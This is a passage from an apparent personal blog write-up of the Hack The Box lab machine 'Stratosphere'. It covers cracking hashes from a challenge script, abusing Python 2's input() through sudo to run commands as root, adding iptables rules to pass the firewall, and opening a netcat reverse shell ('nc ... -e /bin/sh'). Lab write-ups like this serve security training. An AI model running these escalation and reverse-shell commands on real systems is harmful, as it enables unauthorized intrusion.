    <span class="n">md5</span><span class="p">.</span><span class="n">update</span><span class="p">(</span><span class="n">q1</span><span class="p">.</span><span class="n">encode</span><span class="p">())</span>
    <span class="k">if</span> <span class="ow">not</span> <span class="n">md5</span><span class="p">.</span><span class="n">hexdigest</span><span class="p">()</span> <span class="o">==</span> <span class="s">"5af003e100c80923ec04d65933d382cb"</span><span class="p">:</span> <span class="c1">#kaybboo! and use quotes "" in order to avoid EOL error
</span>        <span class="k">print</span><span class="p">(</span><span class="s">"Sorry, that's not right"</span><span class="p">)</span>
        <span class="k">return</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"You got it!"</span><span class="p">)</span>
    <span class="n">q2</span> <span class="o">=</span> <span class="nb">input</span><span class="p">(</span><span class="s">"Now what's this one? d24f6fb449855ff42344feff18ee2819033529ff</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
    <span class="n">sha1</span> <span class="o">=</span> <span class="n">hashlib</span><span class="p">.</span><span class="n">sha1</span><span class="p">()</span>
    <span class="n">sha1</span><span class="p">.</span><span class="n">update</span><span class="p">(</span><span class="n">q2</span><span class="p">.</span><span class="n">encode</span><span class="p">())</span>
    <span class="k">if</span> <span class="ow">not</span> <span class="n">sha1</span><span class="p">.</span><span class="n">hexdigest</span><span class="p">()</span> <span class="o">==</span> <span class="s">'d24f6fb449855ff42344feff18ee2819033529ff'</span><span class="p">:</span> <span class="c1">#ninjaabisshinobi
</span>        <span class="k">print</span><span class="p">(</span><span class="s">"Nope, that one didn't work..."</span><span class="p">)</span>
        <span class="k">return</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"WOW, you're really good at this!"</span><span class="p">)</span>
    <span class="n">q3</span> <span class="o">=</span> <span class="nb">input</span><span class="p">(</span><span class="s">"How about this? 91ae5fc9ecbca9d346225063f23d2bd9</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
    <span class="n">md4</span> <span class="o">=</span> <span class="n">hashlib</span><span class="p">.</span><span class="n">new</span><span class="p">(</span><span class="s">'md4'</span><span class="p">)</span>
    <span class="n">md4</span><span class="p">.</span><span class="n">update</span><span class="p">(</span><span class="n">q3</span><span class="p">.</span><span class="n">encode</span><span class="p">())</span>
    <span class="k">if</span> <span class="ow">not</span> <span class="n">md4</span><span class="p">.</span><span class="n">hexdigest</span><span class="p">()</span> <span class="o">==</span> <span class="s">'91ae5fc9ecbca9d346225063f23d2bd9'</span><span class="p">:</span> <span class="c1">#legend72
</span>        <span class="k">print</span><span class="p">(</span><span class="s">"Yeah, I don't think that's right."</span><span class="p">)</span>
        <span class="k">return</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"OK, OK! I get it. You know how to crack hashes..."</span><span class="p">)</span>
    <span class="n">q4</span> <span class="o">=</span> <span class="nb">input</span><span class="p">(</span><span class="s">"Last one, I promise: 9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
    <span class="n">blake</span> <span class="o">=</span> <span class="n">hashlib</span><span class="p">.</span><span class="n">new</span><span class="p">(</span><span class="s">'BLAKE2b512'</span><span class="p">)</span>
    <span class="n">blake</span><span class="p">.</span><span class="n">update</span><span class="p">(</span><span class="n">q4</span><span class="p">.</span><span class="n">encode</span><span class="p">())</span>
    <span class="k">if</span> <span class="ow">not</span> <span class="n">blake</span><span class="p">.</span><span class="n">hexdigest</span><span class="p">()</span> <span class="o">==</span> <span class="s">'9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943'</span><span class="p">:</span> <span class="c1"># Fhero6610
</span>        <span class="k">print</span><span class="p">(</span><span class="s">"You were so close! urg... sorry rules are rules."</span><span class="p">)</span>
        <span class="k">return</span>

    <span class="kn">import</span> <span class="nn">os</span>
    <span class="n">os</span><span class="p">.</span><span class="n">system</span><span class="p">(</span><span class="s">'/root/success.py'</span><span class="p">)</span>
    <span class="k">return</span>

<span class="n">question</span><span class="p">()</span>
</pre></table></code></div></div><p>I cracked the first ones easily (they are commented alongside their hash), but the last one turned out to be more difficult. It was an encryption I hadn’t ever seen before, so I googled about it. It turned out it could be cracked with John The Ripper (<a href="http://www.openwall.com/lists/john-users/2013/01/02/2">http://www.openwall.com/lists/john-users/2013/01/02/2</a>), so I tried to do a brute-force with the rockyou.txt wordlist:</p><p><em>Cracking the last hash with JTR</em></p><p><img src="/assets/posts_details/Stratosphere/images/john.png" alt="Img" title="Img" /></p><p>Once I had all the hashes, I tried to run the script as sudo (as with <code class="highlighter-rouge">sudo -l</code> I had obtained that user Richard could run the following commands without password: <code class="highlighter-rouge">/usr/bin/python*</code> and <code class="highlighter-rouge">/home/richard/test.py</code>). However, it said success.py wasn’t found. Hence, another approach was needed.</p><p>Again, I was hinted to look at python 2.7 vulnerabilities, and found one which concerned the input function, which was casually used in the script. It is based on the function <code class="highlighter-rouge">input()</code>, which in python 2.x can be exploited thanks to the fact that it is the same as <code class="highlighter-rouge">eval(raw_input())</code>. That means that we can execute arbitrary commands by passing them as arguments or supply a variable as an argument:</p><p><em>Example of the vulnerability</em></p><p><img src="/assets/posts_details/Stratosphere/images/python_vuln.png" alt="Img" title="Img" /></p><p>Therefore, the same exploit can be carried out thanks to the fact that we can run everything that has <code class="highlighter-rouge">/usr/bin/python*</code> (the asterisk is a wildcard in linux and means any string can go there, so we can execute <code class="highlighter-rouge">/usr/bin/python[whatever]</code>) and that there is a python2.7 installed.</p><p>By piping the command as if it were our input, we get to be root and can finally read the hash.</p><p><em>Attack</em></p><p><img src="/assets/posts_details/Stratosphere/images/py_vuln.png" alt="Img" title="Img" /></p><h4 id="root-shell">Root shell?</h4><p>There was one thing that was bothered me after I owned the system: I hadn’t managed to get a root shell. I tried with some reverse shells as input but my netcat listener kept still. That’s why, after some failed attempts, I thought there could be some kind of firewall.</p><p>Checking with iptables, we can see there were some rules applied which could be affecting the connection.</p><p><em>Iptables output (there was no need to import os, I just reused the command above)</em></p><p><img src="/assets/posts_details/Stratosphere/images/iptables.png" alt="Img" title="Img" /></p><p>Thus, given that we can run commands as sudo, we can apply some rules ourselves in order to bypass the firewall for a specific IP. Upon getting the shell, it can be upgraded with python’s tty in order to get a prompt (which I think is a bit nicer).</p><p>The commands used to apply the rules were:</p><div class="language-sh highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre><span class="nb">echo</span> <span class="s1">'__import__("os").system("/sbin/iptables -A INPUT -p tcp -s 10.10.14.137 -j ACCEPT")'</span> | <span class="nb">sudo</span> /usr/bin/python2.7 /home/richard/test.py

<span class="nb">echo</span> <span class="s1">'__import__("os").system("/sbin/iptables -A OUTPUT -p tcp -d  10.10.14.137 -j ACCEPT")'</span> | <span class="nb">sudo</span> /usr/bin/python2.7 /home/richard/test.py
</pre></table></code></div></div><p>Then, passing <code class="highlighter-rouge">nc [ip] [port] -e /bin/sh</code> as the argument to the test.py script I finally get my shell.</p><p><em>Root shell</em></p><p><img src="/assets/posts_details/Stratosphere/images/root_shell.png" alt="Img" title="Img" /></p><hr /><p>Without doubt one of the coolest machines I’ve owned so far, it shows some real vulnerabilities and makes you learn that there are unexpected ways of achieving a goal (with the hashes, I mean).</p><p><em>Diego Bernal Adelantado</em></p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hack-the-box/'>Hack The Box</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/hack-the-box/" class="post-tag no-text-decoration" >Hack The Box</a> <a href="/tags/pentesting/" class="post-tag no-text-decoration" >Pentesting</a> <a href="/tags/apache-struts/" class="post-tag no-text-decoration" >Apache Struts</a> <a href="/tags/sql/" class="post-tag no-text-decoration" >SQL</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><!-- Post sharing snippet v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Hack The Box: Stratosphere write-up - GoDiego&url=https://diego95root.github.io/posts/Stratosphere/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Hack The Box: Stratosphere write-up - GoDiego&u=https://diego95root.github.io/posts/Stratosphere/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Hack The Box: Stratosphere write-up - GoDiego&url=https://diego95root.github.io/posts/Stratosphere/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <a href="https://www.linkedin.com/sharing/share-offsite/?url=https://diego95root.github.io/posts/Stratosphere/" data-toggle="tooltip" data-placement="top" title="Linkedin" target="_blank"> <i class="fa-fw fab fa-linkedin"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><!-- The Pannel on right side (Desktop views) v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"><h3 data-toc-skip>Recent Update</h3><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/Magic/">Hack The Box: Magic write-up</a></li><li><a href="/posts/Cache/">HackTheBox: Cache write-up</a></li><li><a href="/posts/Blunder/">HackTheBox: Blunder write-up</a></li><li><a href="/posts/Admirer/">HackTheBox: Admirer write-up</a></li><li><a href="/posts/Safe/">Hack The Box: Safe write-up</a></li></ul></div><div id="access-tags"><h3 data-toc-skip>Trending Tags</h3><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/sql/">SQL</a> <a class="post-tag" href="/tags/ctf/">CTF</a> <a class="post-tag" href="/tags/ssh/">SSH</a> <a class="post-tag" href="/tags/permissions/">Permissions</a> <a class="post-tag" href="/tags/php/">PHP</a> <a class="post-tag" href="/tags/windows/">Windows</a> <a class="post-tag" href="/tags/smb/">SMB</a> <a class="post-tag" href="/tags/john/">John</a> <a class="post-tag" href="/tags/enumeration/">Enumeration</a> <a class="post-tag" href="/tags/file-upload/">File Upload</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-3">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div id="post-extend-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- Navigation buttons at the bottom of the post. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --><div class="post-navigation d-flex justify-content-between"> <span class="btn btn-outline-primary disabled"><p>-</p></span> <a href="/posts/Sense/" class="btn btn-outline-primary"><p>Hack The Box: Sense write-up</p></a></div><!-- The related posts of current post. Placed in the bottom of every single post. v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div id="related-posts" class="mt-4 mb-2 mb-sm-4 pb-2"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/Magic/"><div class="card-body"> <span class="timeago small"> May 18, 2020 <i class="unloaded">2020-05-18T00:00:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack The Box: Magic write-up</h3><div class="text-muted small"><p>Hack The Box: Magic machine write-up This was an easy machine if you were a bit experienced in web application bugs, as the main vulnerability was a file upload that was used to get a reverse shel...</p></div></div></a></div><div class="card"> <a href="/posts/Admirer/"><div class="card-body"> <span class="timeago small"> Jun 3, 2020 <i class="unloaded">2020-06-03T00:00:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox: Admirer write-up</h3><div class="text-muted small"><p>Hack The Box: Magic machine write-up This was one of the most interesting machines I’ve solved in Hack The Box, learned some cool techniques. It taught me how recon never ends, despite having foun...</p></div></div></a></div><div class="card"> <a href="/posts/Cache/"><div class="card-body"> <span class="timeago small"> Jun 11, 2020 <i class="unloaded">2020-06-11T00:00:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox: Cache write-up</h3><div class="text-muted small"><p>Hack The Box: Cache machine write-up We are back again with a new machine! Cache starts with a simple static website from which we get some hints that there is a virtual host. From there we find a...</p></div></div></a></div></div></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js" crossorigin="anonymous"></script> <script type="text/javascript"> const el = document.querySelectorAll('#post-wrapper img'); const observer = lozad(el); observer.observe(); </script> <!-- The Footer v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2020 <a href="https://twitter.com/secfaults">Diego Bernal Adelantado</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div></div></footer></div><!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/sql/">SQL</a> <a class="post-tag" href="/tags/ctf/">CTF</a> <a class="post-tag" href="/tags/ssh/">SSH</a> <a class="post-tag" href="/tags/permissions/">Permissions</a> <a class="post-tag" href="/tags/php/">PHP</a> <a class="post-tag" href="/tags/windows/">Windows</a> <a class="post-tag" href="/tags/smb/">SMB</a> <a class="post-tag" href="/tags/john/">John</a> <a class="post-tag" href="/tags/enumeration/">Enumeration</a> <a class="post-tag" href="/tags/file-upload/">File Upload</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- The GA snippet v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-167902069-1', 'auto'); ga('send', 'pageview'); </script> --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-167902069-1" crossorigin="anonymous"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-167902069-1'); </script> <!-- Jekyll Simple Search loader v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js" integrity="sha256-qcLR00zq6pJk4je3MLgAri8Nn+ZumUlXgTKR2H/xCY0=" crossorigin="anonymous"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://diego95root.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
